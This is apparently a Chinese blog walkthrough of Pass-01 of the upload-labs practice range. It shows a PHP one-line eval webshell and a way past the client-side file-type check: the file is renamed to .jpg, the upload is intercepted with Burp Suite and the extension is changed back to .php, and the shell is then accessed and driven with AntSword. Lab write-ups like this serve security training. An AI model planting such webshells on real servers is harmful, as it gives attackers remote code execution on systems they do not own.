upload-labs-1

weixin_395050912023-11-08 22:23

文章目录

Pass-01

  1. 先上传一个正常的图片,查看返回结果,结果中带有文件上传路径,可以进行利用:

  2. 上传一个恶意的webshell,里面写入一句话木马: <?php @eval($_POST['cmd']); echo "hello"; ?>

    将脚本名称改成图片格式jpg并上传,使用burpsuite进行拦截,再将jpg后缀改为php后发送:

  3. 发送成功后根据步骤一中的上传地址访问我们的webshell,正确打印出了hello,说明上传脚本成功:

  4. 后续可通过蚁剑利用该webshell执行其他操作:

相关推荐
weixin_395050911 年前
DVWA - 3
靶场练习
热门推荐
01玄机平台应急响应—webshell查杀02Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总04液体神经网络:LNN是个啥概念?05文件或文件夹名称中有空格如何批量去除06组基轨迹建模 GBTM的介绍与实现(Stata 或 R)07新版微信小程序获取用户手机号08优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间09基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测102024最新 无人机 数据集(不定期更新)